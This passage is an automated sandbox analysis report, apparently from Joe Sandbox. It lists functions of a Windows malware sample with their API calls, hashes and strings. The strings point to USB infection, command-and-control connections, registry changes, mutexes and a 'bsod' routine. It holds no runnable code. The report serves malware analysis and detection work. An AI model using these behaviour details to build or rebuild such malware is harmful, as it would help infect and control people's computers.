                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,00406C55,00000000), ref: 00406DA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID: NtQueryInformationProcess$NtSetInformationProcess$Ul@$ntdll.dll
                                                                  • API String ID: 4139908857-2971258217
                                                                  • Opcode ID: 62a2a73916b9af1f8daf532ab0fdb30c97b42ff7dfa5a627ce04c4475a55d3f5
                                                                  • Instruction ID: e665a3cd0ad87b6e4d351724504253e06bb2307510cb7435dea9c92ab51fd615
                                                                  • Opcode Fuzzy Hash: 62a2a73916b9af1f8daf532ab0fdb30c97b42ff7dfa5a627ce04c4475a55d3f5
                                                                  • Instruction Fuzzy Hash: 8E01D4B234131837EA205A49DC45FEB779CCB85769F010167FE08B72C0DAB99D4082E8
                                                                  Function 00366D90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,00366C55,00000000), ref: 00366DA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID: NtQueryInformationProcess$NtSetInformationProcess$Ul6$ntdll.dll
                                                                  • API String ID: 4139908857-2811123161
                                                                  • Opcode ID: 5fd636623081ad5c6746a1ce7be883d8c68ddfb55d15ceed93d87562152ce491
                                                                  • Instruction ID: 919aabcb657efc3160e91a43329e1d5cee3d4597fc80562b609242bd3a539148
                                                                  • Opcode Fuzzy Hash: 5fd636623081ad5c6746a1ce7be883d8c68ddfb55d15ceed93d87562152ce491
                                                                  • Instruction Fuzzy Hash: 500184B274161837EA32595D9C46FEA739CCB86779F018156FE08AB284DAA59D0082E1
                                                                  Function 0040FAA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ProcWindowsprintf
                                                                  • String ID: %c:\$@WA$[USB]: Infected %s
                                                                  • API String ID: 3179433310-3310510632
                                                                  • Opcode ID: fd5a5e364699ce4a0fdc81f4504cbf464797e88720b1db6411780ffb4476f92d
                                                                  • Instruction ID: 02eb9736952d2a2b4b7c1167389122037410bde8fc9acd6e29a5ba8690f26e1d
                                                                  • Opcode Fuzzy Hash: fd5a5e364699ce4a0fdc81f4504cbf464797e88720b1db6411780ffb4476f92d
                                                                  • Instruction Fuzzy Hash: 6111E7B55001085BC720DF64DC41EBB737CEB44308F04857EFE05A2282E639E9558B69
                                                                  Function 0036FAA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ProcWindowsprintf
                                                                  • String ID: %c:\$@W7$[USB]: Infected %s
                                                                  • API String ID: 3179433310-2394137797
                                                                  • Opcode ID: f543c488bb0884bdc4adc060a152600484997cbc20d7aedcb432ecc3a0c38227
                                                                  • Instruction ID: ea1b93b6b24bb468e43115b7495a5c73d6d85e8c6f414671986e278512830218
                                                                  • Opcode Fuzzy Hash: f543c488bb0884bdc4adc060a152600484997cbc20d7aedcb432ecc3a0c38227
                                                                  • Instruction Fuzzy Hash: 7411E3B65001085FCB25DF68EC52EBB736CEB44304F04C968FE0997246EA31D951CF61
                                                                  Function 0040D530 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 121sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D5E4
                                                                    • Part of subcall function 00408F50: ApplyControlToken.SECUR32(?,?), ref: 00408FB5
                                                                    • Part of subcall function 00408F50: InitializeSecurityContextA.SECUR32(?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00408FF9
                                                                    • Part of subcall function 00408F50: DeleteSecurityContext.SECUR32(?,?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00409025
                                                                    • Part of subcall function 00408F50: FreeCredentialsHandle.SECUR32(?), ref: 0040902F
                                                                  • Sleep.KERNEL32(0000000F), ref: 0040D659
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ContextSecuritySleep$ApplyControlCredentialsDeleteFreeHandleInitializeToken
                                                                  • String ID: %s:%d$cnc$VA
                                                                  • API String ID: 3241915987-2824176248
                                                                  • Opcode ID: 20c79ff23815496d10ba28f53a97e5ef7eb88f931315f02d53633f4a8f91e0ef
                                                                  • Instruction ID: 3fba86e59980fe9d4d7b2036a9b00bfb261980af2cf933dbcae5c76902665172
                                                                  • Opcode Fuzzy Hash: 20c79ff23815496d10ba28f53a97e5ef7eb88f931315f02d53633f4a8f91e0ef
                                                                  • Instruction Fuzzy Hash: 6C41D6B5E00104EBC710EBD9DC819AEB3B9EB84318F14457AFD09E7391DA35ED0487A9
                                                                  Function 0036D530 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 121sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNEL32(000003E8), ref: 0036D5E4
                                                                    • Part of subcall function 00368F50: ApplyControlToken.SECUR32(?,?), ref: 00368FB5
                                                                    • Part of subcall function 00368F50: InitializeSecurityContextA.SECUR32(?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00368FF9
                                                                    • Part of subcall function 00368F50: DeleteSecurityContext.SECUR32(?,?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 00369025
                                                                    • Part of subcall function 00368F50: FreeCredentialsHandle.SECUR32(?), ref: 0036902F
                                                                  • Sleep.KERNEL32(0000000F), ref: 0036D659
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ContextSecuritySleep$ApplyControlCredentialsDeleteFreeHandleInitializeToken
                                                                  • String ID: %s:%d$cnc$V7
                                                                  • API String ID: 3241915987-288577137
                                                                  • Opcode ID: a166691f6ed2eb12e9b610c35a9c4949241980e87640e2064536707b2c0be8fe
                                                                  • Instruction ID: 672eb53ee4bf5a25192f836364db1fe4fc185d56af003a34fe7ae0075d99e68c
                                                                  • Opcode Fuzzy Hash: a166691f6ed2eb12e9b610c35a9c4949241980e87640e2064536707b2c0be8fe
                                                                  • Instruction Fuzzy Hash: F241E3B6E00104ABC726DB99EC819AEB3BDEB85314F158165F909DB30ADB71ED4087A1
                                                                  Function 004016F0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 88stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strstr$lstrcmp
                                                                  • String ID: bdns$block
                                                                  • API String ID: 142677638-4143068083
                                                                  • Opcode ID: 16de161929d562d1a81be2ce0f5dc1ee04b4dd39fc5185927e1aa3bde43099bf
                                                                  • Instruction ID: 124088c1a3f70e1cbae084184767cd66ed6bf528bf03336b987e05220ac7cc48
                                                                  • Opcode Fuzzy Hash: 16de161929d562d1a81be2ce0f5dc1ee04b4dd39fc5185927e1aa3bde43099bf
                                                                  • Instruction Fuzzy Hash: 9121B0766012086BDB10DF49AC85EFB736CDB88711F14812BFD05E3291E778ED5186BA
                                                                  Function 003616F0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 88stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strstr$lstrcmp
                                                                  • String ID: bdns$block
                                                                  • API String ID: 142677638-4143068083
                                                                  • Opcode ID: 49719317cb468a0ae38202d6bfdad452ab49506c180a23054aaaa2580947ecda
                                                                  • Instruction ID: 555bcffc5ca8faf6e183e2b3b2150bae9b22eb1b3f3732b71f3e01d6e7c93e47
                                                                  • Opcode Fuzzy Hash: 49719317cb468a0ae38202d6bfdad452ab49506c180a23054aaaa2580947ecda
                                                                  • Instruction Fuzzy Hash: 3821C4766012086B9B22DE59EC86DBB736CDB88711F08C119FC09D7201E774ED1487F1
                                                                  Function 00407E20 Relevance: 7.6, APIs: 5, Instructions: 65networkmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,0000103A), ref: 00407E2C
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00407E63
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00407E7A
                                                                  • connect.WS2_32(?,00000008,00000010), ref: 00407E8B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AllocLocalconnectioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 3721573447-0
                                                                  • Opcode ID: 6a0cf34466a604d09193a111f7b2e156c19cd74b9b825a2281b43bf372efd1ff
                                                                  • Instruction ID: 8573ccf17625dbd4e70cb95bd4ecb179e2b8f2d801530163547a45014eaf0546
                                                                  • Opcode Fuzzy Hash: 6a0cf34466a604d09193a111f7b2e156c19cd74b9b825a2281b43bf372efd1ff
                                                                  • Instruction Fuzzy Hash: E811D631A00304ABC720DF59D805AD6B7A8DB49724F00469AFA59DB3D1D2B169908794
                                                                  Function 00367E20 Relevance: 7.6, APIs: 5, Instructions: 65networkmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,0000103A), ref: 00367E2C
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00367E63
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00367E7A
                                                                  • connect.WS2_32(?,00000008,00000010), ref: 00367E8B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AllocLocalconnectioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 3721573447-0
                                                                  • Opcode ID: 10c2d2c5d31b4b5f38ae8fd0baf6be88ba34f547113950efd8f6941bd99097e7
                                                                  • Instruction ID: e83f810f3307b80f796c94b4d89c6e623e78c13480129eae9bf5b50f242efe01
                                                                  • Opcode Fuzzy Hash: 10c2d2c5d31b4b5f38ae8fd0baf6be88ba34f547113950efd8f6941bd99097e7
                                                                  • Instruction Fuzzy Hash: 5911E631A00704AFC730DF68D849ED6B7A8EF49724F00869AFA5DDB391D2B1A8548790
                                                                  Function 0040E770 Relevance: 7.6, APIs: 5, Instructions: 50registrystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?), ref: 0040E77C
                                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00000012,?), ref: 0040E793
                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 0040E7B5
                                                                  • RegNotifyChangeKeyValue.ADVAPI32 ref: 0040E7C3
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040E7D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ChangeCloseNotifyOpenlstrlen
                                                                  • String ID:
                                                                  • API String ID: 2592630252-0
                                                                  • Opcode ID: af4cde93d3db90eb8642d8f6f32dd5aa766a189061079ea768f5a47468b3961d
                                                                  • Instruction ID: 817f0236f2bd820b7f614add4cf1e09f77a3d0cd335360597150fdbb8a11f275
                                                                  • Opcode Fuzzy Hash: af4cde93d3db90eb8642d8f6f32dd5aa766a189061079ea768f5a47468b3961d
                                                                  • Instruction Fuzzy Hash: BF011A75740304BFE720CF65DC89F977BACEB88B50F10C429BB499B690D674E8408B68
                                                                  Function 0036E770 Relevance: 7.6, APIs: 5, Instructions: 50registrystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?), ref: 0036E77C
                                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00000012,?), ref: 0036E793
                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 0036E7B5
                                                                  • RegNotifyChangeKeyValue.ADVAPI32 ref: 0036E7C3
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0036E7D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ChangeCloseNotifyOpenlstrlen
                                                                  • String ID:
                                                                  • API String ID: 2592630252-0
                                                                  • Opcode ID: 71613d8df9322482468eb674335943dd637ea3684389d1b6b429199d298963fe
                                                                  • Instruction ID: 2c85a111577bb5bad62c448310fb158792a7921f66f3c1140621e4e5120b58e8
                                                                  • Opcode Fuzzy Hash: 71613d8df9322482468eb674335943dd637ea3684389d1b6b429199d298963fe
                                                                  • Instruction Fuzzy Hash: 5A01DE76350344BFE730CB69DC85F9777ACEB88B50F108419BA499B680D675E8809B64
                                                                  Function 00407700 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 46stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040771E
                                                                  • _snprintf.MSVCRT ref: 00407738
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407747
                                                                    • Part of subcall function 00404900: WaitForSingleObject.KERNEL32(00407495,000000FF,?,00000000,756F59EB,?,00407495), ref: 00404939
                                                                    • Part of subcall function 00404900: ReleaseMutex.KERNEL32(?,?,00407495), ref: 0040497C
                                                                  • lstrcmpA.KERNEL32(00000000,00411A30), ref: 0040777F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: MutexObjectReleaseSingleWait_snprintflstrcmplstrlenmemset
                                                                  • String ID: state_%s
                                                                  • API String ID: 1716770999-3670522127
                                                                  • Opcode ID: 235272e43844a436d13b728baab66befe5b0e802e7c81055b935bd28c73822a3
                                                                  • Instruction ID: 2cd1af118f2aaba9ee0144bd5bb7b35bf02337a9ecf34d3b98cb7566c03369e6
                                                                  • Opcode Fuzzy Hash: 235272e43844a436d13b728baab66befe5b0e802e7c81055b935bd28c73822a3
                                                                  • Instruction Fuzzy Hash: 0C01DBF5A903087BDB10F7A4DE0BFF9736C9B44704F0045E9B719A2082F5B46A448799
                                                                  Function 00367700 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 46stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036771E
                                                                  • _snprintf.MSVCRT ref: 00367738
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00367747
                                                                    • Part of subcall function 00364900: WaitForSingleObject.KERNEL32(00367495,000000FF,?,00000000,756F59EB,?,00367495), ref: 00364939
                                                                    • Part of subcall function 00364900: ReleaseMutex.KERNEL32(?,?,00367495), ref: 0036497C
                                                                  • lstrcmpA.KERNEL32(00000000,00371A30), ref: 0036777F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: MutexObjectReleaseSingleWait_snprintflstrcmplstrlenmemset
                                                                  • String ID: state_%s
                                                                  • API String ID: 1716770999-3670522127
                                                                  • Opcode ID: 52643eb95f64d567a635d13d37d1b6d9466f33161a3cec5df7e5f86bb5de1245
                                                                  • Instruction ID: db7228121507ce2399d7bd12aa91f4cbac28bedde2d871d9c20ec24077593767
                                                                  • Opcode Fuzzy Hash: 52643eb95f64d567a635d13d37d1b6d9466f33161a3cec5df7e5f86bb5de1245
                                                                  • Instruction Fuzzy Hash: 5101FEB69503087ADB25F6A4DD0BFF973AC8B44704F40C5D4FA1DE6081F5B45A544B90
                                                                  Function 004050F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 0040510F
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00405122
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040512B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMutexObjectSingleWait_snprintf
                                                                  • String ID: %s-comm
                                                                  • API String ID: 3057366584-1028030816
                                                                  • Opcode ID: a93b1516683958c1d9d60c9ee514b9fb12ccde5092aeeca8bbe9916ea1720a1c
                                                                  • Instruction ID: 467e8c21684c0235fe829960707385420c5f419fa334f9ea544b7238d55dbfde
                                                                  • Opcode Fuzzy Hash: a93b1516683958c1d9d60c9ee514b9fb12ccde5092aeeca8bbe9916ea1720a1c
                                                                  • Instruction Fuzzy Hash: 44210875A802047BE714DF91CC46FEB3328B784706F1409AAF504A72D2E6B89E44DBA8
                                                                  Function 003650F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 0036510F
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00365122
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0036512B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMutexObjectSingleWait_snprintf
                                                                  • String ID: %s-comm
                                                                  • API String ID: 3057366584-1028030816
                                                                  • Opcode ID: 960aadf89982522ef0b9c9624a0620d23d9c0cb866200c7825bdfd5789247b34
                                                                  • Instruction ID: 888e425b904f19f39087ee86c3fd34e49c3e679b83eb9e9027e10f52aa2ab210
                                                                  • Opcode Fuzzy Hash: 960aadf89982522ef0b9c9624a0620d23d9c0cb866200c7825bdfd5789247b34
                                                                  • Instruction Fuzzy Hash: 06213672A80208BBD716DB54DC42FEB332CEB81711F158A56F504BB2C2EA70DA44CBA0
                                                                  Function 00405070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 0040508F
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 004050A2
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004050AB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMutexObjectSingleWait_snprintf
                                                                  • String ID: %s-pid
                                                                  • API String ID: 3057366584-2694366501
                                                                  • Opcode ID: ff6920a4f34576960947fc1b5a3d0ac86d7dd6ac261b0cca6cf284f5e966243f
                                                                  • Instruction ID: 655e5f0feb57342864bd118bf9991db32f12074da84674c84bcde0045b314480
                                                                  • Opcode Fuzzy Hash: ff6920a4f34576960947fc1b5a3d0ac86d7dd6ac261b0cca6cf284f5e966243f
                                                                  • Instruction Fuzzy Hash: C9F052F0A4030467EB20A7B09C8BFDB3218D310711F10067BF714B22E0E9F88AC08AAD
                                                                  Function 00365070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 0036508F
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 003650A2
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003650AB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMutexObjectSingleWait_snprintf
                                                                  • String ID: %s-pid
                                                                  • API String ID: 3057366584-2694366501
                                                                  • Opcode ID: 3424791592088aae3a2a1caab2587e50558002dcfcf265069e37afb30e08b7ce
                                                                  • Instruction ID: ec8ef4cb54789c9c04655a3a07dd06083f9e6553e6a5f96ceecd191b7b7eb2fb
                                                                  • Opcode Fuzzy Hash: 3424791592088aae3a2a1caab2587e50558002dcfcf265069e37afb30e08b7ce
                                                                  • Instruction Fuzzy Hash: A9F0E2B2A50208A7EB22A7749C8BF96326C9710711F108666F718A61C4E9B58AC48AA1
                                                                  Function 0040D760 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00407700: memset.MSVCRT ref: 0040771E
                                                                    • Part of subcall function 00407700: _snprintf.MSVCRT ref: 00407738
                                                                    • Part of subcall function 00407700: lstrlenA.KERNEL32(00000000), ref: 00407747
                                                                  • Sleep.KERNEL32(00001388), ref: 0040D78A
                                                                  • Sleep.KERNEL32(00002710), ref: 0040D795
                                                                  • ExitProcess.KERNEL32 ref: 0040D799
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep$ExitProcess_snprintflstrlenmemset
                                                                  • String ID: bsod
                                                                  • API String ID: 706155222-1315366068
                                                                  • Opcode ID: 5388deed1a02275c41a8fd53f22eb3b9fef4c2e063f1b81cc4663499f754aae8
                                                                  • Instruction ID: 29af33aa6d3d1f262d87ea6fb0a6dfe9123b99fa97d7c71365f1f2103470005d
                                                                  • Opcode Fuzzy Hash: 5388deed1a02275c41a8fd53f22eb3b9fef4c2e063f1b81cc4663499f754aae8
                                                                  • Instruction Fuzzy Hash: 77D05E71D84230A3D22123A56C0AF8B59209F40F61F164232EA05BB5E0C5A8298684EE
                                                                  Function 0036D760 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00367700: memset.MSVCRT ref: 0036771E
                                                                    • Part of subcall function 00367700: _snprintf.MSVCRT ref: 00367738
                                                                    • Part of subcall function 00367700: lstrlenA.KERNEL32(00000000), ref: 00367747
                                                                  • Sleep.KERNEL32(00001388), ref: 0036D78A
                                                                  • Sleep.KERNEL32(00002710), ref: 0036D795
                                                                  • ExitProcess.KERNEL32 ref: 0036D799
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep$ExitProcess_snprintflstrlenmemset
                                                                  • String ID: bsod
                                                                  • API String ID: 706155222-1315366068
                                                                  • Opcode ID: a0fd5bf2ebf4530a77b98c455f3b5272493f2fc3dc76b1516cf7e70036dace40
                                                                  • Instruction ID: f3e2d958bb690e665032387763d646ec105b4383e61970dd9fbcc2d3b0047112
                                                                  • Opcode Fuzzy Hash: a0fd5bf2ebf4530a77b98c455f3b5272493f2fc3dc76b1516cf7e70036dace40
                                                                  • Instruction Fuzzy Hash: 80D05EB2A9423063D233276A1C0AF5B59689F40F61F468210E909AB5988595698184E6
                                                                  Function 0040E840 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00407330: memset.MSVCRT ref: 00407351
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(?), ref: 00407369
                                                                    • Part of subcall function 00407330: _snprintf.MSVCRT ref: 00407381
                                                                    • Part of subcall function 00407330: _vsnprintf.MSVCRT ref: 004073A3
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(00000000), ref: 004073B2
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000D760,00000000,00000000,00000000), ref: 0040E861
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E868
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CloseCreateHandleThread_snprintf_vsnprintfmemset
                                                                  • String ID: admin$isadmin
                                                                  • API String ID: 3136305548-1977506819
                                                                  • Opcode ID: 8b8f0a5b3d5e5b2fa0b53b3b26b7233dacb213c356718c0c7739795dadb7a47b
                                                                  • Instruction ID: 3b6143c26c68504e08692baad0537c2f2dacd248f620d2e63fa73881cbd2d311
                                                                  • Opcode Fuzzy Hash: 8b8f0a5b3d5e5b2fa0b53b3b26b7233dacb213c356718c0c7739795dadb7a47b
                                                                  • Instruction Fuzzy Hash: 66D0E975BD5340B6F56027A05E0FF4965545728F06F208432BB05F91D1E6E8709455AD
                                                                  Function 0036E840 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00367330: memset.MSVCRT ref: 00367351
                                                                    • Part of subcall function 00367330: lstrlenA.KERNEL32(?), ref: 00367369
                                                                    • Part of subcall function 00367330: _snprintf.MSVCRT ref: 00367381
                                                                    • Part of subcall function 00367330: _vsnprintf.MSVCRT ref: 003673A3
                                                                    • Part of subcall function 00367330: lstrlenA.KERNEL32(00000000), ref: 003673B2
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000D760,00000000,00000000,00000000), ref: 0036E861
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036E868
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
